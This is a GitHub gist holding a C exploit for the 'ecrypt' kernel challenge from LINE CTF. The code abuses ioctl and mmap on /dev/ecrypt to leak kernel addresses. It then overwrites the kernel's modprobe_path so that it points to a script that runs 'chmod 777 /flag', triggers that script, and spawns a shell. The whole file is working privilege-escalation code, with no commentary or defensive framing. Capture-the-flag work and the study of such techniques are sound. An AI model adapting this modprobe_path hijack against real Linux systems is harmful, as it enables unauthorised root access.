Created
March 27, 2022 00:08
-
-
Save r4j0x00/7a0ecb31b5010eb73e29220070ed848d to your computer and use it in GitHub Desktop.
linectf ecrypt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <fcntl.h> | |
#include <string.h> | |
#include <stdint.h> | |
#include <sys/ioctl.h> | |
#include <sys/mman.h> | |
#define SETKEY 0x3003003 | |
#define SETIV 0x4004004 | |
#define RESETKEY 0x5005005 | |
#define RESETIV 0x6006006 | |
char buf[0x1000] = {0, }; | |
void modprobe_hax() | |
{ | |
system("echo '#!/bin/sh' > /tmp/x; echo 'chmod 777 /flag' >> /tmp/x"); | |
system("chmod +x /tmp/x"); | |
int ff = open("/tmp/asd", O_WRONLY|O_CREAT); | |
write(ff, "\xff\xff\xff\xff", 4); | |
close(ff); | |
system("chmod 777 /tmp/asd; /tmp/asd"); | |
system("sh"); | |
} | |
int main(void) { | |
int result; | |
int fd = open("/dev/ecrypt", O_RDWR); | |
printf("[*] fd: %d\n", fd); | |
result = ioctl(fd, SETKEY, buf); | |
printf("[*] SETKEY: %d\n", result); | |
result = ioctl(fd, SETIV, buf); | |
printf("[*] SETIV: %d\n", result); | |
uint64_t* ptr = mmap(0xcafebabe000, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0x1000); | |
printf("[*] mmap!! -> %p\n", ptr); | |
for (int i = 0; i < 512; i++) { | |
if (ptr[i] != 0) { | |
printf("[*] ptr[%d]: %lx\n", i, ptr[i]); | |
} | |
} | |
char asd[] = "modprobe"; | |
result = ioctl(fd, SETKEY, asd); | |
printf("[*] SETKEY: %d\n", result); | |
uint64_t modprobe = (ptr[1] & ~0xfffffff) + 0x3502540-0x10; | |
uint64_t _modprobe = modprobe - 0x3502540 + 0x264e608 + 0x10; | |
uint64_t modprobe_ctl[] = {0, 0, ptr[0], _modprobe}; | |
ptr[0] = modprobe; | |
result = ioctl(fd, SETKEY, (void *)modprobe_ctl); | |
int mp = open("/proc/sys/kernel/modprobe", 0); | |
uint64_t modprobe_path; | |
read(mp, &modprobe_path, 8); | |
ptr[0] = modprobe_path; | |
printf("modprobe: %#lx\n", modprobe_path); | |
strcpy(asd, "/tmp/x"); | |
ioctl(fd, SETKEY, asd); | |
modprobe_hax(); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment